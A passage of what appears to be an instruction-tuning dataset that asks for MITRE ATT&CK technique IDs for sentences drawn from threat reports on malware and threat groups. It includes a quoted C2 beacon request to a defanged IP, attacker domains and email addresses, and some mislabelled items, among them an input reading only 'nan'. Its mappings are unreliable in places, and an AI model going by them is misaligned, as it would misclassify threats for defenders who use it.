Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has compressed network communications and encrypted them with a custom stream cipher.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can download its second stage from a hardcoded URL within the loader's code.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ferocious Kitten has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has used SMTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 used the command prompt to launch commands on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used search order hijacking to load a malicious DLL.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used WMI for persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, Internet Server Application Programming Interface extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The rule files are in the plist format and define the name, event type, and action to take.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has set the hostnames of its C2 infrastructure to match legitimate hostnames in the victim environment.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most of these actions are under the control of the operating system, but you can also add custom actions here.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN10 has used Meterpreter to enumerate users on remote systems.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KEYMARBLE can upload files to the victim’s machine and can download additional payloads.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DealersChoice leverages vulnerable versions of Flash to perform execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has also obfuscated payloads with base64, XOR, and RC4.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie has the ability to proxy communications with command and control servers.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used NBTscan and custom tools to discover remote systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are various means to encapsulate a protocol within another protocol.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has used TLS-encrypted FTP to exfiltrate data.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used dynamic DNS service providers to host malicious domains.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex has collected the computer name and OS architecture information from the system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service .### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can parse Outlook .pst files to extract e-mail addresses.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also opt to enumerate processes via /proc.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has acquired open-source tools for some of it's operations; for example it acquired Invoke-PSImage to establish an encrypted channel from a compromised host to Sandworm Team's C2 server as part of its preparation for the 2018 Winter Olympics attack.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN is initially packed.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has hashed a string containing system information prior to exfiltration via POST requests.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT12 has used the RIPTIDE RAT, which communicates over HTTP with a payload encrypted with RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sys10 collects the account name of the logged-in user and sends it to the C2.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Disk Structure Wipe may be performed in isolation, or along with Disk Content Wipe if all sectors of a disk are wiped.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explosive has collected the MAC address from the victim's machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GRIFFON has used a screenshot module that can be used to take a screenshot of the remote system.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use net share to identify network shares for use in lateral movement.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SOUNDBITE is capable of enumerating and manipulating files and directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The command prompt can be invoked remotely via Remote Services such as SSH.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can collect the computer name and OS version from a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has used WMI to recompile the Managed Object Format files in the WMI repository.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This variation of the Zebrocy downloader begins by gathering the serial number for the storage volume with the label “C:\” and the computer name### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FlawedAmmyy enumerates the privilege level of the victim during the initial infection.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used malware that can upload additional files to the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WinRM can be used as a method of remotely interacting with Windows Management Instrumentation.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has been delivered via spearphishing attachments disguised as PDF documents.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 deployed rootkits on Linux systems.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used the “net view” command to locate mapped network shares.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has also exfiltrated stolen files to OneDrive and 4shared.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used a modified version of HTRAN in which they obfuscated strings such as debug messages in an apparent attempt to evade detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Grandoreiro payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explosive has a function to download a file to the infected system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum can obtain the date and time of the compromised system.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UBoatRAT can start a command shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FlawedAmmyy beacons out the victim operating system and computer name during the initial infection.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has used RAR to stage and compress local folders.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PowerShell script executes a compressed first stage PowerShell child process, which then performs a second stage PowerShell process### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has a command built in to use a raw TCP socket.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has used Python-based tools for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The persona may exist on a single site or across multiple sites .### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has accessed and collected credentials from password managers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy has been packaged with a legitimate tax preparation software.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command and control communications are hidden in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke used malware to download additional malicious files to the target system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used malware to gather credentials from FTP clients and Outlook.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc can overwrite files indicated by the attacker before deleting them.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa has used PsExec to copy and execute the ransomware.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has the ability to upload and download files to and from an infected host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A keylogging tool used by APT3 gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OwaAuth has been loaded onto Exchange servers and disguised as an ISAPI filter .### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can create a scheduled task for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The case we found arrived through a targeted email that contained a document file (in docx format).### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InstallUtil.exe### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used malicious e-mail attachments to lure victims into executing malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This also describes which commands users can run as other users or groups.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor can copy cmd.exe into the system temp folder.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke can wait 30 seconds before executing additional code if security software is detected.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis has a version written in PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has used Group Policy Objects to deploy batch scripts.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE uses HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open links.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to subvert these trust mechanisms.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Within Linux and MacOS systems, sudo allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With elevated permission , this attribute can be removed from any file.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi obfuscates its configuration data with XOR.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNSPOT decrypts SUNBURST, which was stored in AES128-CBC encrypted blobs.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3] A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis The threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5] The group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The resulting HTTP POST request looks like the following: POST http://185.25.50[.]93/syshelp/kd8812u/protocol.php HTTP/1.1 Host: 185.25.50[.]93 Content-Type: application/x-www-form-urlencoded Content-Length: 21 porg=44908AE0524f422d We have not seen a C2 server respond to our requests during our analysis, however, we do know how the Trojan will parse the C2’s response for specific data### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy has a module for Mimikatz to collect Windows credentials from the victim’s machine.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets or Search Victim-Owned Websites.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to Exploitation for Privilege Escalation.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork has used spearphishing with links to deliver files with exploits to initial victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cleaver has obtained and used open-source tools such as PsExec, Windows Credential Editor, and Mimikatz.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT has a plugin to perform RDP access.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar obtains a list of running processes through WMI querying.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer can enumerate the sessions for each user logged onto the infected host.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Final1stspy creates a Registry Run key to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Internal Reconnaissance APT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nidiran can create a new service named msamger .### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the LogonUser function.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sykipot has been known to establish persistence by adding programs to the Run Registry key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wingbird side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,iKitten will zip up the /Library/Keychains directory before exfiltrating it.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon stores information gathered from the endpoint in a file named 1.hwp.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can collect passwords stored in web browers, including Internet Explorer, Edge, Chrome, and Naver Whale.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun can detect the computer name, operating system, and other native system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERTON is written in PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer has attempted to brute force TCP ports 135 and 1433 with the default username or list of usernames and passwords.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct Exploitation for Privilege Escalation using a signed, but vulnerable driver.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker copies itself into the %systemroot%\system32 directory and registers as a service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage cmd to execute various commands and payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GRIFFON has used a reconnaissance module that can be used to retrieve Windows domain membership information.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These scans may also include more broad attempts to Gather Victim Host Information that can be used to identify more commonly known, exploitable vulnerabilities.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkHydrus has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files .### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Notes: * RID 500 account is the local, built-in administrator.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has a command to get the public IP address from a system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has used NetCat and PortQry to enumerate network connections and display the status of related TCP and UDP ports.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig can download remote files onto victims.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper has the ability to execute a PowerShell script to get information from the infected host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has downloaded scripts from GitHub.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec also disguised malicious modules using similar filenames as custom network encryption software on victims.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some adversaries may also use Automated Collection on the local system.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the /altvba option, once the Application.Startup event is received.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has used WMIC to execute commands on remote computers.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about network topologies may also be exposed to adversaries via online or other accessible data sets .### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can compromise and manipulate devices that perform encryption of network traffic.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie uses blogs and third-party sites to avoid DNS-based blocking of their communication to the command and control server.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The overwritten instruction (displayed in Figure 1) is used to call the “WinExec” function from kernel32.dll, as depicted in the instruction at 00430c12, which calls the “WinExec” function### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources.### Assistant: T1580: Cloud Infrastructure Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEARDROP ran as a Windows service from the c:\windows\syswow64 folder.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Detecting Avast  A unique feature of this latest Astaroth Trojan campaign is the malware's ability to search for specific security products and exploit them### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use tools to collect credentials from web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MiniDuke can gather the hostname on a compromised machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT has a function to delete files from the victim’s machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to identify the location, public IP address, and domain name on a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can use a legitimate process name to hide itself.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has embedded VBScript components in LNK files to download additional files and automate collection.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has used the BOtB tool which exploits CVE-2019-5736.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine .### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT is able to wipe event logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to use application shimming for persistence if it detects it is running as admin on Windows XP or 7, by creating a shim database to patch services.exe.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet gathers the username from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can query Windows\CurrentVersion\Uninstall for installed applications.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNSPOT malware was designed and used to insert SUNBURST into software builds of the SolarWinds Orion IT management product.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 11 Embedded BMP file containing encrypted string data RC4 is used to decrypt this data using a 16-byte key that is stored within the BMP file at offset 0x502### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL has used HTTP to communicate with a single hard-coded C2 server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ARTIFACTS: Documents: 2781526f6b302da00661b9a6a625a5a6ecf4ffccafa61202e9b0e9b61b657867 c357396ca82fdcd6b6f46b748f2b6941051dbc81be5326cf9548e6e95507af7c ffebcc4d2e851baecd89bf11103e3c9de86f428fdeaf0f8b33d9ea6f5ef56685 Domains: true-deals[.]com; strikes-withlucky[.]com Email account in registration is: isvarawski@yahoo.com Attacker email account: adrian.1987clark@yahoo.com### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has used raw TCP for C2.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has downloaded code from a C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has created new social media accounts for targeting efforts.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,nan### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.### Assistant: T1526: Cloud Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WinMM is usually configured with primary and backup domains for C2 communications.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEXTMATE executes cmd.exe to provide a reverse shell to adversaries.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT has checked for the existence of a Service key to determine if it has already been installed on the system.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can download and deploy additional 